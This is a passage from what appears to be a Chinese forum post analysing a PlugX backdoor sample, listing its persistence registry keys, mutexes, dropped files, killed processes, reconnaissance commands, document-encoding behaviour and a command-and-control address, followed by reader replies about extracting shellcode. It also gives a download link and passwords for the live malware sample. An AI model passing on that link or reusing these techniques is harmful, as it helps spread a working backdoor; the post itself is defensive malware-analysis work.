函数先提升权限，后创建一个线程创建一个套接字实现连接操作，可以执行远程用户的命令来篡改受感染的计算机，之后创建一个注册表Software\CLASSES\ms-pu\PROXY。

执行case3如下

case3

实现发送消息、执行shell的open操作。并且执行run_self操作。

总结

样本的行为事件总结如下：

注册表项

AvastSvcPYT = "% ProgramData% \ AvastSvcPYT \ AvastSvc.exe" : HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \Windows \ CurrentVersion \ Run
AvastSvcPYT = "% ProgramData% \ AvastSvcPYT \ AvastSvc.exe" : HKEY_CURRENT_USER \ Software \ Microsoft \Windows \ CurrentVersion \ Run
HKEY_LOCAL_MACHINE \ SYSTEM \ ControlSet001 \ Control \ Network Version = 1
HKEY_CURRENT_USER \ System \ CurrentControlSet \ Control \ Network Version = 1
HKEY_LOCAL_MACHINE \ SOFTWARE \ Classes \ ms-pu CLSID = {645FF040-5081-101B-9F08-00AA002F954E}

互斥体

USB_NOTIFYCOP
USB_NOTIFYINF

创建文件/目录

% ProgramData% \ AvastSvcPYT
% ProgramData% \ AvastSvcPYT \ AvastSvc.exe
% ProgramData% \ AvastSvcPYT \ AvastAuth.dat
% ProgramData% \ AvastSvcPYT \ wsc.dll

删除的文件

它会删除在终止进程的文件夹中找到的所有文件。(未定位)
它删除终止进程的文件夹。(未定位)
它将以下文件放入 {Drive} \RECYCLER.BIN：
- tmp.bat
- c3lzLmluZm8
- CEFHelper.exe
- AvastAuth.dat
- wsc.dll

创建进程

% ProgramData% \ AvastSvcPYT \ AvastSvc.exe

关闭进程

AdobeHelper.exe
AdobeUpdates.exe
AdobeUpdate.exe
AdobeARM.exe
AAM Update.exe
AAM Updates.exe

信息泄露（执行的命令）

systeminfo
ipconfig
netstat
arp
tasklist

编码/加密

扩展名为 .doc、.docx、.ppt、.pptx、.xls、.xlsx、.pdf使用base64加密并放入回收站

远程连接

45.142.166.[112]

第一次分析APT样本，在网络连接方面没确定接收命令的接收函数在哪。从恶意程序网络连接的行为来看，可以推测存在远程命令执行的操作。另外恶意进程在任务管理器中无法删除，存在删除终止进程的文件的代码，也没定位。后面会随缘再尝试分析代码找找。感谢您读到这。

样本链接

链接：https://pan.baidu.com/s/1Y_xrV-7fAQRziJ7Z7u4PUQ
提取码：pttc
压缩密码：52pojie

参考链接：

https://www.trendmicro.com/vinfo/jp/threat-encyclopedia/print/malware/Backdoor.Win32.PLUGX.EYSGVM

codeTheWorld · 发表于 2024-12-25 16:00

codeTheWorld 发表于 2024-1-23 09:37
下面我们进行动态分析在v10下断点找到shellcode进行提取。。。谁解释一下，这个v10的地址是如何在od中找到 ...

在Localalloc函数运行后下个断点，此时eax的值为shellcode的起始位置，然后在最后sub_100015D0函数传参的edx为shellcode的长度

Wikhan09 · 发表于 2022-7-29 12:23

大佬学习到了

iamasbgfi · 发表于 2022-7-30 12:30

用的vtcp 可靠通信库

slsljgjg · 发表于 2022-8-2 12:51

谢谢，学到了

iamok · 发表于 2022-8-2 15:43

刚好之前中了这个，火绒都没提示，直到查U盘后往U盘回收站写文件被拦截才发现

Vikings · 发表于 2022-8-11 18:19

学习啦哈哈哈哈

aspllh · 发表于 2022-10-11 19:50

楼主威武！！！！！！

codeTheWorld · 发表于 2024-1-22 16:54

学习到了

codeTheWorld · 发表于 2024-1-23 09:37

下面我们进行动态分析在v10下断点找到shellcode进行提取。。。谁解释一下，这个v10的地址是如何在od中找到的？

codeTheWorld · 发表于 2024-1-23 10:10

以及如何用OD，动态调试dll文件的。有详细的操作步骤吗？想跟着操作一下

帐号		自动登录	找回密码
密码			注册[Register]

[PC样本分析] PlugX样本分析

PlugX样本分析

样本信息

AvastSvc.exe

wsc.dll

shellcode

case1

run_self()函数

case2

sub_100153A0()

sub_10015600()

sub_10014E10()

sub_100151E0()

sub_10015030()

case3

总结

注册表项

互斥体

创建文件/目录

删除的文件

创建进程

关闭进程

信息泄露（执行的命令）

编码/加密

远程连接

样本链接

参考链接：

免费评分